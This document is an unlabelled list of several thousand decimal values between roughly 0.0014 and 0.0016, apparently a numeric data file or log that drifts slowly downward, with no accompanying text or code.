0.0015793
0.00157505
0.00157505
0.00157928
0.00157512
0.00157509
0.00157925
0.00157931
0.00157505
0.00157512
0.00157928
0.00157505
0.00157504
0.00157932
0.00157932
0.00157504
0.00157932
0.00157504
0.00157051
0.00156628
0.00157053
0.00156635
0.00157053
0.00157048
0.00156631
0.00157051
0.00156628
0.00157054
0.00156635
0.00157049
0.00157053
0.00156631
0.00157504
0.00157053
0.00155299
0.0015575
0.0015575
0.00156178
0.00156178
0.00156178
0.0015575
0.0015575
0.00155297
0.0015488
0.00155299
0.00154874
0.00155294
0.00155299
0.00154877
0.00155297
0.00154881
0.001553
0.00154874
0.00155299
0.00155294
0.00154877
0.00155754
0.00156176
0.0015617
0.00155751
0.00155758
0.00156174
0.00155751
0.00155754
0.00156176
0.00156171
0.00155751
0.00156174
0.00155751
0.00155758
0.00155301
0.00154873
0.00154873
0.00155301
0.00155301
0.00154873
0.001553
0.0015575
0.00157053
0.00157052
0.00156626
0.00156628
0.00157053
0.00157052
0.00156626
0.00157503
0.0015793
0.00157504
0.00157931
0.00157503
0.00157503
0.00157505
0.0015793
0.00157929
0.00157503
0.00157931
0.00157505
0.00157054
0.00156627
0.00157053
0.00157053
0.00156627
0.00155749
0.00156174
0.00156176
0.00155751
0.00156176
0.0015575
0.00155749
0.001553
0.00155299
0.00154873
0.00154873
0.001553
0.00155749
0.00156176
0.0015575
0.00156176
0.00155749
0.00155299
0.00155298
0.00154874
0.00154872
0.00154872
0.00155298
0.00155299
0.00155749
0.00156176
0.00156175
0.00155751
0.00156176
0.00155749
0.00155751
0.001553
0.00155299
0.00154873
0.001553
0.00154873
0.0015575
0.00156177
0.00155751
0.00156177
0.0015575
0.00155299
0.00155298
0.00154872
0.00154874
0.00155299
0.00155298
0.00154873
0.00157053
0.00157052
0.00156628
0.00156626
0.00157052
0.00157053
0.00156626
0.00157504
0.00157931
0.00157505
0.00157504
0.00157931
0.00157504
0.00157506
0.0015793
0.00157931
0.00157505
0.00157931
0.00157504
0.00157054
0.00156626
0.00157053
0.00157054
0.00156626
0.00157053
0.00157052
0.00156626
0.00156628
0.00157053
0.00157052
0.00156626
0.00157504
0.00157931
0.00157505
0.00157931
0.00157504
0.00157504
0.00157506
0.00157931
0.00157929
0.00157931
0.00157504
0.00157505
0.00157054
0.00156626
0.00157053
0.00157053
0.00156626
0.00155749
0.00156174
0.00156176
0.00155751
0.00156176
0.00155751
0.00155749
0.001553
0.00155299
0.00154873
0.001553
0.00154873
0.00155749
0.00156176
0.0015575
0.00156176
0.00155749
0.00155299
0.00155297
0.00154874
0.00154872
0.00155298
0.00155299
0.00154872
0.00155749
0.00156176
0.00156174
0.00155751
0.00156176
0.00155749
0.0015575
0.00155299
0.00155299
0.00154873
0.00155299
0.00154873
0.00155749
0.00156176
0.0015575
0.00156176
0.00155749
0.00155299
0.00155297
0.00154872
0.00154874
0.00155299
0.00155298
0.00154872
0.00157055
0.00156627
0.00156627
0.00157055
0.00157055
0.00156627
0.00157509
0.00157925
0.0015793
0.00157505
0.00157505
0.00157928
0.00157513
0.00157509
0.00157926
0.0015793
0.00157505
0.00157512
0.00157928
0.00157506
0.00157504
0.00157932
0.00157932
0.00157504
0.00157932
0.00157504
0.00157051
0.00156628
0.00157053
0.00156636
0.00157053
0.00157049
0.00156631
0.00157051
0.00156628
0.00157054
0.00156635
0.00157049
0.00157054
0.00156631
0.00157505
0.00157054
0.00155299
0.0015575
0.0015575
0.00156178
0.00156178
0.00156178
0.0015575
0.0015575
0.00155297
0.00154881
0.001553
0.00154874
0.00155294
0.00155299
0.00154877
0.00155297
0.00154881
0.001553
0.00154874
0.00155299
0.00155295
0.00154877
0.00155754
0.00156176
0.00156171
0.00155751
0.00155758
0.00156174
0.00155751
0.00155755
0.00156176
0.00156171
0.00155751
0.00156174
0.00155751
0.00155758
0.00155301
0.00154873
0.00154873
0.00155301
0.00155301
0.00154873
0.001553
0.0015575
0.00157054
0.00157053
0.00156628
0.00156627
0.00157053
0.00157054
0.00156627
0.00157504
0.00157931
0.00157505
0.00157504
0.00157931
0.00157504
0.00157507
0.0015793
0.00157931
0.00157506
0.00157931
0.00157504
0.00157054
0.00156627
0.00157053
0.00157054
0.00156627
0.00157054
0.00157053
0.00156628
0.00156627
0.00157052
0.00157054
0.00156627
0.00157504
0.00157931
0.00157505
0.00157931
0.00157504
0.00157504
0.00157507
0.0015793
0.00157931
0.00157931
0.00157506
0.00157504
0.00157054
0.00156627
0.00157053
0.00157054
0.00156627
0.00155749
0.00156175
0.00156176
0.00155751
0.00156176
0.00155751
0.00155749
0.00155299
0.00155299
0.00154872
0.00155299
0.00154872
0.00155749
0.00156177
0.00155751
0.00156177
0.00155749
0.00155299
0.00155298
0.00154874
0.00154872
0.00155298
0.00155299
0.00154872
0.00155749
0.00156175
0.00156176
0.00155751
0.00156176
0.00155751
0.00155749
0.00155299
0.00155298
0.00154872
0.00155299
0.00154872
0.00155749
0.00156176
0.0015575
0.00156176
0.00155749
0.00155299
0.00155298
0.00154874
0.00154872
0.00155298
0.00155299
0.00154872
0.00157505
0.00157053
0.00157504
0.00157053
0.0015575
0.00156178
0.00156178
0.00156178
0.0015575
0.0015575
0.00155297
0.00154881
0.00155299
0.00154874
0.00154877
0.00155294
0.00155299
0.00155297
0.0015488
0.00155299
0.00154874
0.00154877
0.00155294
0.00155299
0.00155754
0.00156176
0.0015617
0.00155751
0.00156174
0.00155758
0.00155751
0.00155754
0.00156176
0.0015617
0.00155751
0.00156174
0.00155758
0.00155751
0.00155301
0.00154873
0.00154873
0.00154873
0.00155301
0.00155301
0.00155299
0.0015575
0.00155299
0.0015575
0.00153996
0.00153546
0.00153996
0.00153545
0.00153547
0.00153119
0.00153119
0.00153547
0.00153547
0.00153119
0.00154
0.00154416
0.00154422
0.00153997
0.0015442
0.00153997
0.00154004
0.00154
0.00154417
0.00154422
0.00153997
0.0015442
0.00153997
0.00154004
0.00153996
0.00154424
0.00154424
0.00154424
0.00153996
0.00153996
0.00153543
0.0015312
0.00153546
0.00153127
0.00153545
0.00153123
0.0015354
0.00153543
0.0015312
0.00153545
0.00153127
0.00153545
0.00153123
0.0015354
0.00151792
0.00152243
0.00151791
0.00152242
0.00152242
0.0015267
0.0015267
0.0015267
0.00152242
0.00152242
0.00151789
0.00151372
0.00151792
0.00151366
0.00151791
0.00151786
0.00151369
0.00151789
0.00151372
0.00151791
0.00151366
0.00151791
0.00151786
0.00151369
0.00152246
0.00152668
0.00152662
0.00152243
0.00152666
0.00152243
0.0015225
0.00152246
0.00152668
0.00152662
0.00152243
0.00152666
0.00152243
0.00152249
0.00151793
0.00151365
0.00151365
0.00151793
0.00151793
0.00151365
0.00153545
0.00153544
0.00153118
0.0015312
0.00153545
0.00153544
0.00153118
0.00153996
0.00154423
0.00153997
0.00154423
0.00153996
0.00153995
0.00153997
0.00154422
0.00154421
0.00153995
0.00154422
0.00153997
0.00153546
0.00153119
0.00153545
0.00153546
0.00153119
0.00152242
0.00152668
0.00152667
0.00152243
0.00152669
0.00152241
0.00152243
0.00151792
0.00151791
0.00151365
0.00151365
0.00151792
0.00152242
0.00152669
0.00152243
0.00152669
0.00152242
0.00151792
0.0015179
0.00151365
0.00151367
0.00151365
0.00151791
0.00151791
0.00152241
0.00152668
0.00152667
0.00152243
0.00152668
0.00152241
0.00152243
0.00151792
0.00151792
0.00151365
0.00151792
0.00151365
0.00152242
0.00152669
0.00152243
0.00152669
0.00152242
0.00151792
0.0015179
0.00151365
0.00151367
0.00151791
0.0015179
0.00151365
0.00153547
0.0015312
0.0015312
0.00153547
0.00153547
0.00153119
0.00154
0.00154417
0.00154422
0.00153997
0.00153998
0.0015442
0.00154004
0.00154
0.00154417
0.00154422
0.00153997
0.00154004
0.0015442
0.00153997
0.00153996
0.00154424
0.00154424
0.00153996
0.00154424
0.00153996
0.00153543
0.00153121
0.00153546
0.00153127
0.00153546
0.0015354
0.00153123
0.00153543
0.00153121
0.00153546
0.00153127
0.0015354
0.00153546
0.00153123
0.00153997
0.00153546
0.00151792
0.00152243
0.00152243
0.00152671
0.00152671
0.00152671
0.00152243
0.00152243
0.0015179
0.00151373
0.00151792
0.00151367
0.00151786
0.00151792
0.0015137
0.0015179
0.00151373
0.00151792
0.00151367
0.00151792
0.00151786
0.0015137
0.00152247
0.00152669
0.00152663
0.00152244
0.0015225
0.00152667
0.00152244
0.00152247
0.00152669
0.00152663
0.00152244
0.00152666
0.00152244
0.0015225
0.00151794
0.00151366
0.00151366
0.00151794
0.00151794
0.00151366
0.00151792
0.00152243
0.00153546
0.00153544
0.00153119
0.0015312
0.00153545
0.00153544
0.00153119
0.00153996
0.00154423
0.00153997
0.00154423
0.00153996
0.00153995
0.00153997
0.00154422
0.00154421
0.00153995
0.00154423
0.00153997
0.00153546
0.00153119
0.00153545
0.00153546
0.00153119
0.00152241
0.00152667
0.00152668
0.00152243
0.00152668
0.00152243
0.00152242
0.00151792
0.00151791
0.00151365
0.00151365
0.00151792
0.00152242
0.00152668
0.00152243
0.00152669
0.00152242
0.00151792
0.0015179
0.00151366
0.00151365
0.00151365
0.0015179
0.00151791
0.00152241
0.00152668
0.00152667
0.00152243
0.00152668
0.00152242
0.00152243
0.00151792
0.00151791
0.00151365
0.00151792
0.00151365
0.00152242
0.00152669
0.00152243
0.00152669
0.00152242
0.00151792
0.0015179
0.00151365
0.00151366
0.00151791
0.0015179
0.00151365
0.00153546
0.00153544
0.0015312
0.00153119
0.00153544
0.00153545
0.00153119
0.00153996
0.00154423
0.00153997
0.00153996
0.00154423
0.00153995
0.00153997
0.00154421
0.00154422
0.00153997
0.00154422
0.00153995
0.00153546
0.00153119
0.00153545
0.00153546
0.00153119
0.00153546
0.00153544
0.00153119
0.00153121
0.00153545
0.00153545
0.00153119
0.00153996
0.00154423
0.00153997
0.00154423
0.00153996
0.00153996
0.00153997
0.00154422
0.00154421
0.00154422
0.00153996
0.00153997
0.00153546
0.00153119
0.00153545
0.00153546
0.00153119
0.00152242
0.00152667
0.00152668
0.00152244
0.00152669
0.00152243
0.00152242
0.00151792
0.00151792
0.00151365
0.00151792
0.00151365
0.00152242
0.00152669
0.00152243
0.00152669
0.00152242
0.00151792
0.00151791
0.00151367
0.00151365
0.00151791
0.00151792
0.00151365
0.00152242
0.00152669
0.00152667
0.00152244
0.00152669
0.00152242
0.00152243
0.00151793
0.00151792
0.00151366
0.00151793
0.00151366
0.00152242
0.00152669
0.00152244
0.00152669
0.00152242
0.00151792
0.00151791
0.00151365
0.00151367
0.00151792
0.00151791
0.00151365
0.00153547
0.00153119
0.00153119
0.00153547
0.00153547
0.00153119
0.00154
0.00154417
0.00154422
0.00153997
0.00153997
0.0015442
0.00154004
0.00154
0.00154416
0.00154422
0.00153997
0.00154004
0.0015442
0.00153997
0.00153996
0.00154424
0.00154424
0.00153996
0.00154424
0.00153996
0.00153543
0.0015312
0.00153546
0.00153127
0.00153545
0.0015354
0.00153123
0.00153543
0.0015312
0.00153545
0.00153127
0.0015354
0.00153545
0.00153123
0.00153996
0.00153545
0.00151792
0.00152243
0.00152242
0.0015267
0.0015267
0.0015267
0.00152242
0.00152242
0.00151789
0.00151372
0.00151792
0.00151367
0.00151786
0.00151792
0.00151369
0.00151789
0.00151372
0.00151792
0.00151366
0.00151791
0.00151786
0.00151369
0.00152247
0.00152668
0.00152662
0.00152243
0.0015225
0.00152666
0.00152244
0.00152247
0.00152669
0.00152663
0.00152243
0.00152666
0.00152244
0.0015225
0.00151793
0.00151365
0.00151365
0.00151793
0.00151793
0.00151365
0.00151792
0.00152243
0.00153545
0.00153543
0.0015312
0.00153118
0.00153543
0.00153545
0.00153118
0.00153995
0.00154422
0.00153996
0.00153995
0.00154422
0.00153995
0.00153997
0.0015442
0.00154421
0.00153996
0.00154422
0.00153995
0.00153545
0.00153118
0.00153544
0.00153545
0.00153118
0.00153545
0.00153543
0.0015312
0.00153118
0.00153544
0.00153545
0.00153118
0.00153995
0.00154422
0.00153996
0.00154422
0.00153995
0.00153995
0.00153997
0.0015442
0.00154422
0.00154422
0.00153996
0.00153995
0.00153545
0.00153118
0.00153544
0.00153545
0.00153118
0.00152241
0.00152667
0.00152668
0.00152243
0.00152668
0.00152243
0.00152241
0.00151792
0.00151791
0.00151365
0.00151792
0.00151365
0.00152242
0.00152669
0.00152243
0.00152669
0.00152242
0.00151791
0.0015179
0.00151366
0.00151365
0.0015179
0.00151791
0.00151365
0.00152241
0.00152666
0.00152668
0.00152243
0.00152668
0.00152243
0.00152241
0.00151792
0.00151791
0.00151365
0.00151792
0.00151365
0.00152242
0.00152668
0.00152243
0.00152668
0.00152242
0.00151792
0.0015179
0.00151367
0.00151365
0.00151791
0.00151791
0.00151365
0.00153997
0.00153546
0.00153996
0.00153545
0.00152242
0.0015267
0.0015267
0.00152671
0.00152243
0.00152243
0.0015179
0.00151373
0.00151792
0.00151367
0.0015137
0.00151787
0.00151792
0.0015179
0.00151373
0.00151792
0.00151367
0.0015137
0.00151786
0.00151792
0.00152247
0.00152669
0.00152663
0.00152244
0.00152667
0.0015225
0.00152244
0.00152247
0.00152669
0.00152662
0.00152243
0.00152666
0.0015225
0.00152244
0.00151794
0.00151366
0.00151366
0.00151366
0.00151793
0.00151793
0.00151792
0.00152243
0.00151792
0.00152243
0.00150489
0.00150038
0.00150488
0.00150037
0.00150039
0.00149611
0.00149611
0.00150038
0.00150038
0.0014961
0.00150492
0.00150908
0.00150914
0.00150489
0.00150912
0.00150489
0.00150496
0.00150492
0.00150908
0.00150914
0.00150489
0.00150912
0.00150489
0.00150495
0.00150487
0.00150916
0.00150916
0.00150916
0.00150488
0.00150488
0.00150035
0.00149612
0.00150037
0.00149619
0.00150037
0.00149615
0.00150032
0.00150034
0.00149612
0.00150037
0.00149618
0.00150037
0.00149615
0.00150031
0.00148284
0.00148735
0.00148283
0.00148734
0.00148734
0.00149162
0.00149161
0.00149162
0.00148734
0.00148734
0.00148281
0.00147865
0.00148284
0.00147858
0.00148283
0.00148278
0.00147861
0.00148281
0.00147864
0.00148283
0.00147858
0.00148283
0.00148278
0.00147861
0.00148738
0.0014916
0.00149154
0.00148735
0.00149158
0.00148735
0.00148742
0.00148738
0.0014916
0.00149154
0.00148735
0.00149158
0.00148735
0.00148741
0.00148285
0.00147857
0.00147857
0.00148285
0.00148284
0.00147856
0.00150038
0.00150036
0.00149611
0.00149612
0.00150038
0.00150037
0.00149611
0.00150488
0.00150915
0.00150489
0.00150915
0.00150488
0.00150488
0.0015049
0.00150915
0.00150913
0.00150488
0.00150915
0.00150489
0.00150038
0.00149611
0.00150037
0.00150038
0.00149611
0.00148734
0.00149161
0.00149159
0.00148736
0.00149161
0.00148734
0.00148736
0.00148285
0.00148283
0.00147858
0.00147858
0.00148284
0.00148734
0.00149161
0.00148735
0.00149161
0.00148734
0.00148284
0.00148283
0.00147858
0.00147859
0.00147857
0.00148284
0.00148283
0.00148734
0.00149161
0.0014916
0.00148736
0.00149161
0.00148735
0.00148736
0.00148285
0.00148283
0.00147857
0.00148284
0.00147858
0.00148734
0.00149161
0.00148735
0.00149161
0.00148734
0.00148285
0.00148283
0.00147857
0.00147859
0.00148284
0.00148283
0.00147857
0.0015004
0.00149611
0.00149611
0.00150039
0.00150039
0.00149611
0.00150493
0.00150909
0.00150915
0.00150489
0.0015049
0.00150913
0.00150496
0.00150493
0.00150909
0.00150915
0.0015049
0.00150496
0.00150912
0.0015049
0.00150488
0.00150917
0.00150917
0.00150489
0.00150917
0.00150489
0.00150035
0.00149612
0.00150038
0.00149619
0.00150038
0.00150032
0.00149615
0.00150036
0.00149613
0.00150038
0.00149619
0.00150032
0.00150038
0.00149616
0.00150489
0.00150038
0.00148284
0.00148735
0.00148734
0.00149162
0.00149162
0.00149163
0.00148734
0.00148735
0.00148281
0.00147864
0.00148284
0.00147858
0.00148278
0.00148283
0.00147861
0.00148282
0.00147866
0.00148285
0.00147859
0.00148284
0.00148279
0.00147862
0.00148739
0.0014916
0.00149155
0.00148735
0.00148742
0.00149158
0.00148735
0.00148739
0.00149161
0.00149155
0.00148736
0.00149158
0.00148736
0.00148742
0.00148286
0.00147857
0.00147857
0.00148285
0.00148285
0.00147857
0.00148285
0.00148736
0.00150038
0.00150036
0.00149611
0.00149612
0.00150037
0.00150036
0.00149611
0.00150488
0.00150915
0.00150489
0.00150915
0.00150488
0.00150488
0.0015049
0.00150914
0.00150913
0.00150488
0.00150915
0.00150489
0.00150038
0.00149611
0.00150037
0.00150038
0.00149611
0.00148734
0.00149159
0.00149161
0.00148736
0.00149161
0.00148735
0.00148734
0.00148284
0.00148283
0.00147857
0.00147858
0.00148284
0.00148734
0.00149161
0.00148735
0.00149161
0.00148734
0.00148284
0.00148282
0.00147859
0.00147857
0.00147857
0.00148283
0.00148284
0.00148734
0.00149161
0.00149159
0.00148736
0.00149161
0.00148734
0.00148735
0.00148284
0.00148283
0.00147857
0.00148284
0.00147857
0.00148734
0.00149161
0.00148735
0.00149161
0.00148734
0.00148284
0.00148282
0.00147857
0.00147859
0.00148284
0.00148282
0.00147857
0.00150039
0.00150037
0.00149613
0.00149612
0.00150037
0.00150039
0.00149612
0.00150489
0.00150916
0.0015049
0.00150489
0.00150916
0.00150488
0.00150491
0.00150914
0.00150915
0.0015049
0.00150915
0.00150489
0.00150039
0.00149612
0.00150038
0.00150039
0.00149612
0.00150039
0.00150037
0.00149612
0.00149613
0.00150039
0.00150037
0.00149612
0.00150489
0.00150916
0.0015049
0.00150916
0.00150489
0.00150489
0.0015049
0.00150915
0.00150914
0.00150915
0.00150489
0.0015049
0.00150039
0.00149612
0.00150038
0.00150039
0.00149612
0.00148735
0.0014916
0.00149162
0.00148737
0.00149162
0.00148737
0.00148735
0.00148285
0.00148284
0.00147858
0.00148285
0.00147858
0.00148735
0.00149162
0.00148736
0.00149162
0.00148735
0.00148285
0.00148283
0.0014786
0.00147858
0.00148284
0.00148285
0.00147858
0.00148735
0.00149162
0.0014916
0.00148737
0.00149162
0.00148735
0.00148736
0.00148285
0.00148284
0.00147858
0.00148285
0.00147858
0.00148735
0.00149162
0.00148736
0.00149162
0.00148735
0.00148285
0.00148283
0.00147858
0.0014786
0.00148285
0.00148284
0.00147858
0.00150039
0.00149611
0.00149611
0.00150039
0.00150039
0.00149611
0.00150492
0.00150908
0.00150915
0.00150489
0.00150489
0.00150912
0.00150495
0.00150492
0.00150908
0.00150914
0.00150489
0.00150495
0.00150912
0.00150489
0.00150488
0.00150916
0.00150916
0.00150488
0.00150916
0.00150488
0.00150035
0.00149613
0.00150038
0.00149619
0.00150037
0.00150032
0.00149615
0.00150034
0.00149612
0.00150037
0.00149618
0.00150031
0.00150037
0.00149615
0.00150488
0.00150037
0.00148283
0.00148734
0.00148734
0.00149162
0.00149162
0.00149162
0.00148734
0.00148734
0.00148281
0.00147864
0.00148283
0.00147858
0.00148277
0.00148283
0.00147861
0.00148281
0.00147864
0.00148284
0.00147858
0.00148283
0.00148278
0.00147861
0.00148738
0.0014916
0.00149154
0.00148735
0.00148742
0.00149158
0.00148735
0.00148738
0.0014916
0.00149154
0.00148735
0.00149158
0.00148735
0.00148741
0.00148285
0.00147857
0.00147857
0.00148285
0.00148285
0.00147857
0.00148284
0.00148735
0.00150038
0.00150036
0.00149612
0.00149611
0.00150036
0.00150038
0.00149611
0.00150488
0.00150915
0.00150489
0.00150488
0.00150915
0.00150488
0.0015049
0.00150913
0.00150915
0.00150489
0.00150915
0.00150488
0.00150038
0.00149611
0.00150037
0.00150038
0.00149611
0.00150038
0.00150036
0.00149613
0.00149611
0.00150037
0.00150038
0.00149611
0.00150488
0.00150915
0.00150489
0.00150915
0.00150488
0.00150488
0.0015049
0.00150914
0.00150915
0.00150915
0.0015049
0.00150488
0.00150038
0.00149611
0.00150037
0.00150038
0.00149611
0.00148734
0.00149159
0.00149161
0.00148736
0.00149161
0.00148736
0.00148734
0.00148285
0.00148283
0.00147858
0.00148284
0.00147858
0.00148734
0.00149161
0.00148735
0.00149161
0.00148734
0.00148284
0.00148283
0.00147859
0.00147858
0.00148283
0.00148284
0.00147858
0.00148734
0.0014916
0.00149161
0.00148736
0.00149161
0.00148736
0.00148734
0.00148285
0.00148283
0.00147858
0.00148285
0.00147858
0.00148734
0.00149161
0.00148735
0.00149161
0.00148734
0.00148284
0.00148283
0.00147859
0.00147857
0.00148283
0.00148284
0.00147857
0.00150489
0.00150039
0.00150489
0.00150038
0.00148734
0.00149162
0.00149162
0.00149163
0.00148734
0.00148734
0.00148281
0.00147865
0.00148284
0.00147858
0.00147861
0.00148278
0.00148284
0.00148281
0.00147864
0.00148284
0.00147858
0.00147861
0.00148278
0.00148283
0.00148739
0.00149161
0.00149155
0.00148736
0.00149159
0.00148742
0.00148736
0.00148739
0.00149161
0.00149155
0.00148735
0.00149158
0.00148742
0.00148736
0.00148285
0.00147857
0.00147857
0.00147856
0.00148285
0.00148285
0.00148284
0.00148735
0.00148284
0.00148735
0.00146981
0.0014653
0.00146981
0.0014653
0.00146531
0.00146103
0.00146103
0.00146531
0.00146531
0.00146103
0.00146984
0.00147401
0.00147406
0.00146981
0.00147404
0.00146981
0.00146987
0.00146984
0.001474
0.00147406
0.00146981
0.00147404
0.00146981
0.00146987
0.0014698
0.00147407
0.00147408
0.00147408
0.0014698
0.0014698
0.00146527
0.00146104
0.0014653
0.0014611
0.00146529
0.00146107
0.00146524
0.00146527
0.00146105
0.0014653
0.00146111
0.00146529
0.00146107
0.00146524
0.00144776
0.00145227
0.00144777
0.00145227
0.00145226
0.00145654
0.00145654
0.00145654
0.00145226
0.00145226
0.00144773
0.00144356
0.00144776
0.00144351
0.00144776
0.0014477
0.00144353
0.00144773
0.00144357
0.00144776
0.00144351
0.00144776
0.0014477
0.00144353
0.0014523
0.00145653
0.00145646
0.00145227
0.0014565
0.00145228
0.00145234
0.00145231
0.00145653
0.00145647
0.00145228
0.0014565
0.00145228
0.00145234
0.00144777
0.00144349
0.00144349
0.00144777
0.00144777
0.00144349
0.0014653
0.00146529
0.00146104
0.00146105
0.0014653
0.00146529
0.00146103
0.0014698
0.00147408
0.00146981
0.00147408
0.0014698
0.0014698
0.00146982
0.00147407
0.00147406
0.0014698
0.00147407
0.00146982
0.0014653
0.00146103
0.00146529
0.0014653
0.00146104
0.00145227
0.00145653
0.00145652
0.00145228
0.00145654
0.00145227
0.00145228
0.00144777
0.00144776
0.0014435
0.0014435
0.00144777
0.00145227
0.00145653
0.00145227
0.00145654
0.00145227
0.00144777
0.00144775
0.0014435
0.00144352
0.0014435
0.00144777
0.00144775
0.00145227
0.00145653
0.00145652
0.00145228
0.00145653
0.00145227
0.00145228
0.00144777
0.00144775
0.0014435
0.00144777
0.0014435
0.00145227
0.00145653
0.00145227
0.00145654
0.00145227
0.00144777
0.00144775
0.0014435
0.00144351
0.00144777
0.00144775
0.0014435
0.00146531
0.00146103
0.00146103
0.00146531
0.00146531
0.00146103
0.00146984
0.001474
0.00147406
0.00146981
0.00146981
0.00147404
0.00146987
0.00146984
0.00147401
0.00147407
0.00146982
0.00146988
0.00147404
0.00146982
0.0014698
0.00147408
0.00147408
0.0014698
0.00147408
0.0014698
0.00146527
0.00146104
0.00146529
0.00146111
0.00146529
0.00146524
0.00146107
0.00146527
0.00146104
0.0014653
0.00146111
0.00146524
0.00146529
0.00146107
0.00146981
0.0014653
0.00144776
0.00145227
0.00145225
0.00145654
0.00145654
0.00145654
0.00145226
0.00145226
0.00144772
0.00144356
0.00144775
0.0014435
0.0014477
0.00144775
0.00144353
0.00144772
0.00144356
0.00144775
0.0014435
0.00144775
0.00144769
0.00144352
0.0014523
0.00145652
0.00145646
0.00145227
0.00145234
0.0014565
0.00145227
0.0014523
0.00145652
0.00145646
0.00145227
0.0014565
0.00145227
0.00145233
0.00144777
0.00144349
0.00144349
0.00144776
0.00144776
0.00144348
0.00144776
0.00145227
0.00146531
0.00146529
0.00146104
0.00146105
0.00146531
0.00146529
0.00146104
0.00146981
0.00147407
0.00146981
0.00147408
0.0014698
0.00146981
0.00146982
0.00147407
0.00147406
0.00146981
0.00147407
0.00146982
0.00146531
0.00146103
0.00146529
0.0014653
0.00146104
0.00145227
0.00145652
0.00145654
0.00145229
0.00145654
0.00145228
0.00145227
0.00144777
0.00144776
0.0014435
0.0014435
0.00144777
0.00145227
0.00145654
0.00145228
0.00145654
0.00145227
0.00144778
0.00144775
0.00144352
0.0014435
0.0014435
0.00144776
0.00144777
0.00145227
0.00145654
0.00145652
0.00145229
0.00145654
0.00145227
0.00145228
0.00144777
0.00144776
0.0014435
0.00144777
0.0014435
0.00145227
0.00145653
0.00145227
0.00145654
0.00145227
0.00144777
0.00144776
0.0014435
0.00144352
0.00144777
0.00144776
0.0014435
0.00146531
0.00146529
0.00146105
0.00146104
0.00146529
0.00146531
0.00146104
0.00146981
0.00147408
0.00146982
0.00146981
0.00147408
0.00146981
0.00146983
0.00147406
0.00147408
0.00146982
0.00147408
0.00146981
0.00146531
0.00146104
0.0014653
0.00146531
0.00146104
0.00146531
0.00146529
0.00146104
0.00146105
0.00146531
0.00146529
0.00146104
0.00146981
0.00147408
0.00146982
0.00147408
0.00146981
0.00146981
0.00146982
0.00147408
0.00147406
0.00147408
0.00146981
0.00146982
0.00146531
0.00146104
0.0014653
0.00146531
0.00146104
0.00145227
0.00145652
0.00145654
0.00145228
0.00145654
0.00145228
0.00145227
0.00144777
0.00144775
0.0014435
0.00144777
0.0014435
0.00145227
0.00145654
0.00145227
0.00145654
0.00145227
0.00144777
0.00144775
0.00144351
0.0014435
0.00144775
0.00144777
0.0014435
0.00145227
0.00145654
0.00145652
0.00145228
0.00145654
0.00145227
0.00145228
0.00144777
0.00144776
0.00144349
0.00144777
0.0014435
0.00145227
0.00145654
0.00145228
0.00145654
0.00145227
0.00144777
0.00144775
0.0014435
0.00144351
0.00144777
0.00144775
0.0014435
0.00146531
0.00146103
0.00146103
0.0014653
0.0014653
0.00146102
0.00146984
0.001474
0.00147406
0.00146981
0.00146981
0.00147404
0.00146987
0.00146984
0.001474
0.00147406
0.00146981
0.00146987
0.00147404
0.00146981
0.00146979
0.00147408
0.00147408
0.0014698
0.00147408
0.0014698
0.00146527
0.00146104
0.00146529
0.00146111
0.00146529
0.00146524
0.00146107
0.00146527
0.00146104
0.0014653
0.00146111
0.00146524
0.00146529
0.00146107
0.00146981
0.0014653
0.00144776
0.00145227
0.00145226
0.00145654
0.00145654
0.00145654
0.00145226
0.00145226
0.00144773
0.00144356
0.00144776
0.0014435
0.0014477
0.00144775
0.00144353
0.00144773
0.00144357
0.00144776
0.0014435
0.00144775
0.0014477
0.00144353
0.0014523
0.00145652
0.00145646
0.00145227
0.00145234
0.0014565
0.00145227
0.0014523
0.00145652
0.00145646
0.00145227
0.0014565
0.00145227
0.00145233
0.00144777
0.00144349
0.00144349
0.00144777
0.00144777
0.00144349
0.00144776
0.00145227
0.0014653
0.00146529
0.00146104
0.00146103
0.00146529
0.0014653
0.00146103
0.00146981
0.00147408
0.00146982
0.00146981
0.00147408
0.0014698
0.00146982
0.00147406
0.00147407
0.00146982
0.00147408
0.0014698
0.00146531
0.00146103
0.00146529
0.00146531
0.00146104
0.00146531
0.00146529
0.00146105
0.00146103
0.00146529
0.0014653
0.00146104
0.0014698
0.00147407
0.00146981
0.00147407
0.0014698
0.0014698
0.00146982
0.00147406
0.00147407
0.00147407
0.00146982
0.00146981
0.00146531
0.00146103
0.0014653
0.0014653
0.00146104
0.00145226
0.00145651
0.00145653
0.00145228
0.00145653
0.00145227
0.00145226
0.00144776
0.00144775
0.00144349
0.00144776
0.0014435
0.00145226
0.00145653
0.00145227
0.00145653
0.00145226
0.00144777
0.00144774
0.00144351
0.0014435
0.00144775
0.00144776
0.0014435
0.00145227
0.00145652
0.00145653
0.00145228
0.00145654
0.00145228
0.00145227
0.00144777
0.00144775
0.00144349
0.00144776
0.0014435
0.00145227
0.00145653
0.00145227
0.00145654
0.00145227
0.00144777
0.00144775
0.00144351
0.0014435
0.00144775
0.00144776
0.0014435
0.00146981
0.0014653
0.00146981
0.0014653
0.00145225
0.00145653
0.00145653
0.00145654
0.00145226
0.00145225
0.00144772
0.00144356
0.00144775
0.0014435
0.00144352
0.00144769
0.00144775
0.00144772
0.00144356
0.00144775
0.0014435
0.00144352
0.00144769
0.00144775
0.0014523
0.00145652
0.00145646
0.00145227
0.00145649
0.00145233
0.00145227
0.00145229
0.00145652
0.00145646
0.00145227
0.00145649
0.00145233
0.00145227
0.00144776
0.00144348
0.00144348
0.00144348
0.00144776
0.00144776
0.00144776
0.00145227
0.00144776
0.00145226
0.00143473
0.00143022
0.00143473
0.00143022
0.00143023
0.00142595
0.00142595
0.00143023
0.00143023
0.00142595
0.00143476
0.00143892
0.00143899
0.00143473
0.00143896
0.00143474
0.00143479
0.00143476
0.00143892
0.00143899
0.00143474
0.00143896
0.00143474
0.00143479
0.00143472
0.001439
0.001439
0.001439
0.00143472
0.00143472
0.00143019
0.00142597
0.00143022
0.00142602
0.00143022
0.00142599
0.00143016
0.00143019
0.00142597
0.00143022
0.00142602
0.00143022
0.00142599
0.00143015
0.00141268
0.00141719
0.00141268
0.00141719
0.00141718
0.00142146
0.00142146
0.00142146
0.00141718
0.00141718
0.00141265
0.00140848
0.00141268
0.00140842
0.00141267
0.00141261
0.00140845
0.00141265
0.00140848
0.00141268
0.00140842
0.00141267
0.00141261
0.00140845
0.00141722
0.00142144
0.00142138
0.00141719
0.00142142
0.00141719
0.00141725
0.00141722
0.00142145
0.00142138
0.00141719
0.00142142
0.00141719
0.00141725
0.00141269
0.00140841
0.00140841
0.00141269
0.00141269
0.0014084
0.00143023
0.00143021
0.00142596
0.00142597
0.00143023
0.00143022
0.00142596
0.00143473
